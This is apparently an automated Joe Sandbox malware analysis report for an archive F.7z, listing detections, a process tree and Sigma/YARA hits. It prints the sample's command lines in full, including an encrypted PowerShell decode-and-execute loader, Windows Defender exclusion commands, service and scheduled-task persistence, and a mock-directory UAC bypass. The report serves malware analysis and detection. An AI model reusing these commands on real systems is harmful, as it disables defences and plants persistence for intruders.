Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
F.7z

Overview

General Information

Sample name:F.7z
Analysis ID:1501605
MD5:5132591a35248a8d71171cb5f4343334
SHA1:78a0c5b34c107a68cad2d36424a6efbffac11412
SHA256:ef33c2231c3d46e64e1d070493ef920e34fd4b7aec4145711eeac0cb0ccb6651
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found suspicious ZIP file
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Explorer Process Tree Break
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • OpenWith.exe (PID: 6944 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 6324 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4816 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 6092 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 2480 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5912 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 1032 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4800 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • 7zFM.exe (PID: 4228 cmdline: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Fzip" MD5: 30AC0B832D75598FB3EC37B6F2A8C86A)
  • wscript.exe (PID: 6276 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2044 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3840 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • explorer.exe (PID: 1532 cmdline: explorer "..\USB Drive" MD5: 662F4F92FDE3557E86D110526BB578D5)
      • xcopy.exe (PID: 3268 cmdline: xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
      • xcopy.exe (PID: 4436 cmdline: xcopy "x249569.dat" "C:\Windows \System32" /Y MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
      • printui.exe (PID: 2312 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
      • printui.exe (PID: 2328 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
      • printui.exe (PID: 2924 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
        • cmd.exe (PID: 3588 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3740 cmdline: powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5040 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6580 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7072 cmdline: cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 1256 cmdline: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • reg.exe (PID: 752 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • sc.exe (PID: 1252 cmdline: sc start x338625 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • cmd.exe (PID: 2276 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • console_zero.exe (PID: 3276 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 7D5124735B17F17AB3DACBA515C397F0)
            • cmd.exe (PID: 2104 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 1532 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 2516 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 2564 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • cmd.exe (PID: 6712 cmdline: cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 1488 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • explorer.exe (PID: 2152 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 6412 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 2300 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1420 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5920 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6612 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'E:\';" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 1100 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5020 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'F:\';" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3740INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x144c:$b2: ::FromBase64String(
  • 0xe8729:$b2: ::FromBase64String(
  • 0xe8aa6:$b2: ::FromBase64String(
  • 0xe931e:$b2: ::FromBase64String(
  • 0x1db56d:$b2: ::FromBase64String(
  • 0x1db8ea:$b2: ::FromBase64String(
  • 0x1de5fb:$b2: ::FromBase64String(
  • 0x1de97a:$b2: ::FromBase64String(
  • 0x1def01:$b2: ::FromBase64String(
  • 0x1df43b:$b2: ::FromBase64String(
  • 0x204c36:$b2: ::FromBase64String(
  • 0x28c966:$b2: ::FromBase64String(
  • 0x28ccd1:$b2: ::FromBase64String(
  • 0x290b2f:$b2: ::FromBase64String(
  • 0x291922:$b2: ::FromBase64String(
  • 0x2cfc83:$b2: ::FromBase64String(
  • 0x2d7e11:$b2: ::FromBase64String(
  • 0x32a7ec:$b2: ::FromBase64String(
  • 0x347f4c:$b2: ::FromBase64String(
  • 0x3482cd:$b2: ::FromBase64String(
  • 0x348778:$b2: ::FromBase64String(

Other

SourceRuleDescriptionAuthorStrings
amsi64_3740.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: TrustedPath UAC Bypass Pattern
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2044, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 2312, ProcessName: printui.exe
    Sigma detected: Base64 Encoded PowerShell Command Detected
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 2924, ParentProcessName: printui.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0
    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 3276, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 2516, ProcessName: cmd.exe
    Sigma detected: Invoke-Obfuscation VAR+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 3276, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 2516, ProcessName: cmd.exe
    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 2924, ParentProcessName: printui.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0
    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 2924, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", ProcessId: 5040, ProcessName: cmd.exe
    Sigma detected: Suspicious New Service Creation
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7072, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 1256, ProcessName: sc.exe
